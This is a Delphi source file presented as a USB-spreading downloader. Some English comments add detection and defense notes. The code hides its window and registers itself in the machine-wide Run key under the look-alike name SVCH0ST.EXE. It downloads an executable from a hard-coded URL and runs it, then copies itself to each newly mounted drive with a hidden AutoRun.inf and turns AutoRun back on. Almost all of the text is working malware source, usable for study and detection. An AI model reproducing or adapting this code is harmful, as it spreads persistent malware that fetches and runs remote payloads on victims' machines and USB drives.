下载者U盘传染源码

下载者U盘传染源码

unit Un_Main;


interface


uses
       Windows, Messages, SysUtils,Forms,IniFiles;
type
       // Form class for this sample. It declares three handlers only: form
       // creation, form close, and a handler for WM_DEVICECHANGE broadcasts.
       // FormCreate sets Application.ShowMainForm to False, so the window exists
       // to receive messages and is not displayed.
       TFrm_Main = class(TForm)
       procedure FormCreate(Sender: TObject);
       procedure FormClose(Sender: TObject; var Action: TCloseAction);
       private
       // Bound to WM_DEVICECHANGE through the message directive, so device
       // arrival/removal notifications delivered to this window land here.
       procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
       public
       { Public declarations }
       end;
const
           // File name used for the local copy, the copy placed on removable
           // volumes, and the AutoRun.inf open= entry. It uses the digit 0 in place
           // of the letter O, so it resembles the legitimate SVCHOST.EXE at a glance.
           // Analyst note: a look-alike of a system binary name is a triage
           // indicator in its own right, especially outside its expected location.
           exefile = 'SVCH0ST.EXE';
           // Hard-coded download URL handed to UrlDownloadToFile in Startup.
           // NOTE(review): whether this address ever served a payload cannot be
           // told from this page; treat it as the value published with the sample.
           Buffer = 'http://www.888.com/hello.exe';
           // WM_DEVICECHANGE event and device-type constants. Only
           // DBT_DEVICEARRIVAL and DBT_DEVTYP_VOLUME are referenced by the code
           // visible in this unit; the other two are declared but unused here.
           DBT_DEVICEARRIVAL = $8000;       // system detected a new device
           DBT_DEVICEREMOVECOMPLETE = $8004;       // device is gone
           DBT_DEVTYP_VOLUME = $00000002;       // logical volume
           DBTF_MEDIA = $0001;       // media comings and goings
type
      // Pascal declarations of the structures Windows passes in LParam of
      // WM_DEVICECHANGE. The handler first reads the generic header and, when
      // dbch_devicetype is DBT_DEVTYP_VOLUME, reinterprets the same pointer as
      // the volume structure.
      PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
      TDEV_BROADCAST_HDR = packed record
       dbch_size : DWORD;
       dbch_devicetype : DWORD;   // compared against DBT_DEVTYP_VOLUME by the handler
       dbch_reserved : DWORD;
      end;
       PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
       TDEV_BROADCAST_VOLUME = packed record
           dbcv_size : DWORD;
           dbcv_devicetype : DWORD;
           dbcv_reserved : DWORD;
           dbcv_unitmask : DWORD;   // drive-letter bitmask; the handler maps bit i to chr(i+65)
           dbcv_flags : WORD;       // not read by the code in this unit
       end;


// Static import of URLDownloadToFileA from URLMON.DLL (ANSI variant).
// Called once, from Startup, to fetch the URL in Buffer to a local path.
// Analyst note: this import appearing together with WinExec in a small
// binary that has no visible UI is a common downloader fingerprint and is
// visible in the import table without running the sample.
function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                                       StatusCB: Pointer): LongWord;
                                       stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


// Explicit import of WinExec from kernel32.dll. Startup uses it to launch the
// file it has just downloaded, so process-creation telemetry for this sample
// shows the downloaded file as a child of the downloader process.
function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
                           stdcall; external 'kernel32.dll' name 'WinExec';


var
       // Global form instance for this unit.
       Frm_Main: TFrm_Main;
       // Full local path built in FormCreate from the system directory and
       // exefile; read later by WMDeviceChange as the source of the file copy.
       exefull:string;
implementation


{$R *.dfm}


// Writes a string value into the registry.
//   key     - root key handle supplied by the caller
//   subkey  - path below the root; opened or created via RegCreateKey
//   name    - value name
//   value   - data, stored with type REG_EXPAND_SZ
// Returns True only when RegSetValueEx reports success (0). The result of
// RegCreateKey is not inspected; the function outcome depends on the write alone.
// Analyst note: in this unit the only caller is Startup, which uses it for an
// autostart entry, so the registry write it performs is the persistence event
// to look for in registry auditing or EDR telemetry.
function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
       result := false;
       RegCreateKey(key,PChar(subkey),regkey);
       if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
       result := true;
       RegCloseKey(regkey);
end;


// Persistence plus download-and-execute routine, called from FormCreate when
// the autostart check there fails. TheName is the target path (exefull).
//
// Sequence visible in the code:
//   1. Registers TheName under a value named SVCH0ST in the machine-wide Run
//      autostart location (HKEY_LOCAL_MACHINE).
//   2. Downloads the URL in Buffer to TheName.
//   3. Marks the file hidden + system.
//   4. Shows a message box, then launches the file with WinExec.
// None of the return values are checked, so the message box appears whether
// or not the download worked.
//
// NOTE(review): as rendered on this page the subkey string has no path
// separators; they were probably lost when the page was extracted.
//
// Defender notes: each step leaves an independent artefact - a new Run value
// whose data points into the system directory, an HTTP fetch of an .exe by a
// non-browser process through urlmon, a hidden+system executable with a
// system-binary look-alike name, and a child process started from it. Any one
// of these is a reasonable detection hook; together they are high confidence.
procedure Startup(var TheName:string);
begin
       SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
       UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
       SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
       // Message text reads "File downloaded successfully!" with the title "Success".
       messagebox(0,'文件下载成功!','成功',MB_OK);
       WinExec(PChar(TheName), SW_SHOWDEFAULT);
       //Sleep(500);
       //DeleteMe;
       //freemem(@path,256);
end;


// WM_DEVICECHANGE handler: reacts to the arrival of a new logical volume
// (for example a USB flash drive) and writes to that volume.
//
// Behaviour on DBT_DEVICEARRIVAL with a DBT_DEVTYP_VOLUME header:
//   1. Derives a drive letter from the lowest set bit of dbcv_unitmask.
//   2. If the file named by exefull exists, copies it onto the new volume
//      under the name in exefile and marks the copy read-only + hidden ($3).
//   3. Sets NoDriveTypeAutoRun to 0 in the current user Explorer policies
//      key; 0 means AutoRun is not disabled for any drive type.
//   4. Removes any existing AutoRun.inf on the volume and writes a new one
//      whose [AutoRun] open= entry names the copied file, then marks it
//      read-only + hidden.
// Other WParam values and other device types are ignored.
//
// NOTE(review): the registry path and the drive paths as rendered on this
// page contain no backslashes; this looks like an extraction artefact.
//
// Defender notes:
//   - A process that drops an executable and an AutoRun.inf at the root of a
//     volume seconds after it is mounted is a strong behavioural indicator
//     of removable-media propagation.
//   - A write of NoDriveTypeAutoRun by anything other than policy tooling
//     deserves an alert; enforcing the value through Group Policy keeps a
//     per-user change like this one from weakening the setting.
//   - Windows versions from Windows 7 on do not act on the open= entry for
//     USB mass-storage volumes, so the mechanism mainly matters on legacy or
//     unpatched hosts; a hidden AutoRun.inf on a stick is still evidence that
//     the stick was plugged into an infected machine.
procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
       lpdb : PDEV_BROADCAST_HDR;
       lpdbv : PDEV_BROADCAST_VOLUME;
       unitmask:DWORD;
       i:integer;
       MyIni:TIniFile;
       s:Hkey;
       value:dword ;
       inifile:string;
begin
       lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
       case Msg.WParam of
       DBT_DEVICEARRIVAL :// a device has finished arriving


       if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
       begin
           lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
           unitmask:=lpdbv.dbcv_unitmask;// drive-letter bitmask of the new volume
           for i:=0 to 25 do // walk the 26 possible drive letters
           begin
               if Boolean(unitmask and $1)then// lowest bit set: this is the affected drive
               break;
               unitmask := unitmask shr 1;
           end;
           if fileexists(exefull) then       // copy the local file onto the new volume
           begin
           copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
           // $3 = read-only + hidden
           FileSetAttr(char(i+65) + ':' + exefile,$00000003);
           end;
           inifile:=char(i+65)+':AutoRun.inf';// AutoRun.inf path on the new volume
           RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
           value:=0;
           RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
           RegCloseKey(s);
           if fileexists(inifile) then
           begin
           // clear attributes first so the existing file can be deleted
           FileSetAttr(inifile,$00000000);
           DeleteFile(inifile);
           end;
           MyIni := TIniFile.Create(inifile);
           MyIni.WriteString('AutoRun', 'open',exefile);
           // $3 = read-only + hidden
           FileSetAttr(inifile,$00000003);
       end;
      end;
end;


// Form-creation handler; effectively the entry point of the sample.
//
// Behaviour visible in the code:
//   - Hides the main form, so the process runs without a visible window.
//   - Builds exefull from the system directory and exefile.
//   - Reads the value named SVCH0ST from the machine-wide Run autostart
//     location and compares it, case-insensitively, with exefull.
//   - If a hard-coded system32 path exists and the value matches, it only
//     shows a message box; otherwise it calls Startup (persistence, download,
//     execute).
//
// NOTE(review): the string literals as rendered on this page contain no
// backslashes (including the empty literal between path and exefile); this
// looks like an extraction artefact.
//
// Defender notes: the existence check uses a fixed path instead of exefull,
// and the registry open requests KEY_ALL_ACCESS on HKEY_LOCAL_MACHINE, so on
// a host where the user lacks administrative rights that open is expected to
// fail. Least-privilege accounts therefore blunt both the check and the
// persistence write that Startup attempts.
procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
       Application.ShowMainForm:=False;
       getsystemdirectory(path,120);
       exefull := strpas(path) + '' + exefile;
       size:=256;
       RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
       RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
       RegCloseKey(s);
       // file exists and the autostart entry is already present
       // (message text reads "Autostart succeeded!" with the title "Success")
       if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
       messagebox(0,'自启动成功!','成功',MB_OK)
       else
       Startup(exefull);// download-and-execute routine
end;


// Form-close handler: ends the whole application when the form is closed.
// Sender and Action are not used.
procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
       Application.Terminate;
end;


end.
